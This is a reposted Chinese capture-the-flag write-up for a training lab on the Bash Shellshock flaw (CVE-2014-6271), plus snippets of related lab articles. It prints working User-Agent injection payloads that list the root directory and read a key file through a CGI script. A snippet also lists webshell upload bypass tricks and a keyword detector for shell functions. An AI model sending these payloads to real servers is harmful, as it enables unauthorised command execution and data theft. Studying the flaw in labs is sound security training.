[ 墨者学院 ] 命令执行——Bash漏洞分析溯源

最新推荐文章于 2024-01-24 14:30:32 发布

weixin_30535913

最新推荐文章于 2024-01-24 14:30:32 发布

阅读量227

点赞数

CC 4.0 BY-SA版权

原文链接：http://www.cnblogs.com/qtisec/p/11095444.html

本文详细介绍了安全工程师在授权测试中发现的Bash远程命令执行漏洞，包括漏洞成因、利用方法及实践步骤。通过构造特定请求头，成功执行了远程命令并获取关键信息。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

0x00.题目描述：

背景介绍

安全工程师"墨者"对一单位业务系统进行授权测试，在测试过程中，发现存在bash命令执行漏洞。

实训目标

1、了解bash；

2、了解Bash远程命令执行漏洞形成原因；

3、了解Bash远程命令执行漏洞利用方法；

解题方向

找到poc.cgi文件

0x01.题目分析：

根据题目说明，在网上对Bash远程命令执行漏洞进行了一番学习。

参考连接

freebuf：https://www.freebuf.com/vuls/44994.html

Seebug：https://www.seebug.org/vuldb/ssvid-88877

0x02.解题过程

通过网上的资料搜查，发现此漏洞存在的路径多数在网页/cgi-bin/下，结合题目给的提示，打开http://url/cgi-bin/poc.cgi

构造执行语句插入到请求头的User-Agent头里面

User-Agent: () { :;}; echo; /bin/ls /

然后构造执行语句查看key.txt

User-Agent: () { :;}; echo; /bin/cat /key.txt

转载于:https://www.cnblogs.com/qtisec/p/11095444.html

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

weixin_30535913

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

墨者靶场初级：Bash漏洞分析溯源

qq_43233085的博客

01-15

598

墨者靶场初级：Bash漏洞分析溯源题目背景介绍实训目标解题方向解题步骤题目背景介绍安全工程师"墨者"对一单位业务系统进行授权测试，在测试过程中，发现存在bash命令执行漏洞。实训目标 1、了解bash； 2、了解Bash远程命令执行漏洞形成原因； 3、了解Bash远程命令执行漏洞利用方法；解题方向找到poc.cgi文件解题步骤启动靶场，打开链接访问，是一个显示页面。 Bash...

墨者网络安全——投票常见漏洞分析溯源

weixin_53980169的博客

07-22

1663

墨者网络安全之投票常见漏洞分析溯源

参与评论您还未登录，请先登录后发表或查看评论

墨者 - Bash漏洞分析溯源

吃肉唐僧的博客

06-30

651

bash代码注入的安全漏洞分析 bash的环境变量环境变量是操作系统运行shell中的变量，很多程序的运行需要获取系统的环境变量参数。具体赋值格式如下： $ var="hello world" 然后你就可以使用这个变量了,但是只是局部变量，即是当前进程可以用，若当前进程的子进程或者其他进程需要用，需要用到 export将本进程的变量copy到其他进程。丽日...

墨者学院-Bash漏洞分析溯源

JimWu的博客

09-04

265

Bash漏洞分析溯源难易程度:★★ 题目类型:命令执行 使用工具:FireFox浏览器、wwwscan 1.打开靶场，根据题目思路找poc.cgi。 2.使用wwwscan扫一下发现有目录/cgi-bin 3.打开burpsuite，访问/cgi-bin/poc.cgi，截包。 send to repeater，修改user-agent为() { :;}; echo; /bin/ls / ...

Bash漏洞分析溯源

Ju0se

11-24

512

漏洞编号: CVE-2014-6271 漏洞名称: Linux Bash远程可执行漏洞漏洞影响范围: 所有安装GNU bash 版本小于或者等于4.3的Linux操作系统漏洞检测: 使用以下命令检测是否存在此漏洞： env x='() { :;}; echo vulnerable' bash -c "echo this is a test" 如果返回显示有“vulnera...

墨者学院 - Bash漏洞分析溯源

多崎巡礼的博客

10-10

1326

bash漏洞技术层面分析漏洞起源：漏洞信息最早来源于国外知名漏洞网站exploit-db下的第34765篇漏洞报告，其中出现了一条验证命令： env x='() { :;}; echo vulnerable' bash -c "echo this is a test" 如果在一个含有版本号小于bash 4.3的linux或者unix系统上执行以上命令，可能会得到以下输出： vu...

墨者学院-投票常见漏洞分析溯源

Ruoten的博客

01-01

3571

1.进入靶场，任务要求是需要我们投票，把a2019的票数成为第一，就是所谓的刷票，完成后，就会获得key值 2.然后打开BurpSuite打开响应包拦截，当我们点击投票按钮，BurpSuite就会拦截到一个响应包 3.点击鼠标右键点击"send to Intruder"，然后把响应包的内容进行修改，修改User-Agent的头数据为"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrom.

墨者学院-PHPMailer远程命令执行漏洞溯源

qq_47094508的博客

07-01

1006

拿到靶场之后点击访问分享一个小工具，用来爬取相关的url Link Gopher可以看到有用的就一个mail.php 进入之后来到一个邮件测试页面，很明显这里是一个功能点 phpmailer介绍PHPMailer是一个用于发送电子邮件的PHP函数包。直接用PHP就可以发送，无需搭建复杂的Email服务。相关漏洞CVE编号(CVE-2016-10033)burp抓包，更改email处payload为更改message处payload为然后访问http://124.70.71.251

墨者靶场登录密码重置漏洞分析溯源关卡

喜欢创作各种技术类文章，希望可以帮到你

01-24

682

显示手机号不存在，下面提示：你已注册的手机号为：18868345809，输入获取验证码。获取到验证码，然后再把需要重置密码的手机号17101304128填入，点击重置密码。提示重置17101304128登录密码，我们。获得key,然后退出来提交key即可过关。注册并登录墨者学院，搜索登录密码重置。下图，填好信息点击获取。

检测cgi-bin漏洞存在方法

热门推荐

xiaoshan812613234的专栏

12-25

2万+

bash漏洞技术层面分析漏洞起源：漏洞信息最早来源于国外知名漏洞网站exploit-db下的第34765篇漏洞报告，其中出现了一条验证命令： env x='() { :;}; echo vulnerable' bash -c "echo this is a test"，如果在一个含有版本号小于bash 4.3的linux或者unix系统上执行以上命令，可能会得到以下输出： v

0x2D.Bash漏洞分析溯源

qq_31679787的博客

11-01

266

Bash远程命令执行漏洞存在于网站的/cgi-bin/目录下；抓包后在HTTP请求中插入poc； poc： User-Agent: () { :;}; echo; /bin/ls / 再构造poc能够查看key文件；漏洞详情： https://www.freebuf.com/vuls/44994.html ...

Bash漏洞分析溯源 cgi文件（CVE-2014-6271） --墨者学院

小白鸽

08-03

723

01 背景介绍 Bash脚本在解析某些特殊字符串时出现逻辑错误导致可以执行后面的命令，在一些cgi脚本中，数据是通过环境变量来传递的，这样就会形成该漏洞； bash通过以函数名作为环境变量名，以“（）{”（bash只有在遇到特殊的环境变量才会触发该漏洞）开头的字串作为环境变量的值来将函数定义导出为环境变量。而该漏洞就在于BASH处理这样的“函数环境变量”的时候，并没有以函数结尾“}”为结束，而是一直执行其后的shell命令。 02 影响版本所有安装GNU bash 版本小于或者等于4.3的Linux操作系

在线靶场-墨者-命令执行2星-Bash漏洞分析溯源

weixin_42079912的博客

08-09

347

打开靶场网页。根据解题方向:找到poc.cgi文件。查询资料的得知poc.cgi文件在/cgi-bin/路径下。 bash详细分析后得知bash在处理含有函数定义诸如”() { :;};”的环境变量赋值的代码上存在设计缺陷，错误地将函数定义后面的字符串作为命令执行。设法让系统接受一个含有"(函数定义)+(任意命令)“的环境变量赋值则可触发”(任意命令)"部分所表示的代码执行。用() { :; ...

墨者Bash漏洞分析溯源题解

zr1213159840的博客

01-07

462

这个漏洞是看别人的思路解出来的，因为在打开页面后，我扫描不出来其他东西，惭愧后台存在一个地址，是http://219.153.49.228:49581/cgi-bin/poc.cgi 访问这个地址对着地址进行抓包将user-agent进行修改，修改为() { :;}; echo; /bin/ls / 重放一下看下效果能看到读取出了目录的内容，我们直接读取key.txt，将user-agent修改为：() { :;}; echo; /bin/cat /key.txt。拿到key ...

墨者学院 - 投票常见漏洞分析溯源

多崎巡礼的博客

07-31

1781

首先用burp抓包，然后把包发送到intruder因为提示用微信投票，所以把User-Agent:改成 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.98 MicroMessenger/6.0NetType/2G 然后添加X-Forwarded-For:1...

Bash漏洞

diexingxia6458的博客

09-25

289

1、漏洞的起因　　这个漏洞的起因源自于Bash(Bourne Again SHell)的ENV指令　　http://ss64.com/bash/env.html env Display, set, or remove environment variables, Run a command in a modified environment. Synt...

墨者学院WebShell文件上传漏洞分析溯源(第1题)

最新发布

04-03

### 墨者学院 WebShell 文件上传漏洞分析与溯源方法 #### 背景概述 WebShell 是一种嵌入到目标服务器中的脚本程序，攻击者可以通过它远程控制受害者的服务器。文件上传漏洞通常允许攻击者通过伪造请求或其他手段绕过安全机制，在服务器上放置恶意脚本。在墨者学院的相关题目中提到的内容涉及多个方面，包括 MIME 类型篡改、禁用 JavaScript 绕过前端验证以及利用后缀名规避检测等技术[^1]。 --- #### 漏洞成因分析文件上传漏洞的主要原因在于服务端对上传文件的安全校验不足。具体表现为以下几个方面： 1. **MIME 类型校验不严格** 攻击者可以使用工具（如 Burp Suite）抓取 HTTP 请求并修改其 MIME 类型字段，从而绕过基于内容类型的限制。例如，将 `.txt` 文件伪装为 `image/jpeg` 格式的图片文件。 2. **依赖客户端验证** 如果仅依靠浏览器端的 JavaScript 验证来阻止非法文件类型，则容易被禁用或绕过。一旦禁用了 JavaScript 功能，就可以轻松提交不符合预期规则的文件[^2]。 3. **扩展名校验缺陷** 当某些应用只检查文件名而未深入解析实际内容时，可能会接受带有特殊后缀名（比如 `.php5`, `.pht` 等变种 PHP 扩展）的文件作为合法输入[^3]。这使得即使表面上看似正常的文件也可能隐藏潜在威胁。 --- #### 解决方案建议为了有效防范此类问题的发生，可以从以下几方面着手改进防护措施: - 加强服务端逻辑设计, 不应单纯信任来自用户的任何数据; - 对于上传过程实施多重过滤策略, 如限定白名单内的 mime-type 和尺寸范围之外还需确认最终存储形式确实无害； - 定期审查现有代码库寻找可能存在的安全隐患点，并及时修补已知漏洞；以下是实现上述部分功能的一个 Python 示例演示如何初步判断一个给定字符串是否可能是危险命令执行语句的一部分: ```python import re def is_potentially_dangerous(input_string): pattern = r'(?:exec|passthru|shell_exec|system|proc_open|popen)' match_result = re.search(pattern, input_string.lower()) return bool(match_result) test_strings = ["<?php echo 'hello'; ?>", "<?php system('ls'); ?>"] for s in test_strings: print(f"'{s}' -> {is_potentially_dangerous(s)}") ``` 此函数会返回 True 或 False 表明传入参数是否存在可疑的关键字组合。 --- #### 总结通过对墨者学院案例的学习可以看出，针对 web shell 的防御工作需要综合考虑多层面的因素，从前端界面交互直至后台数据库操作均需保持高度警惕以防万一环节疏漏造成严重后果。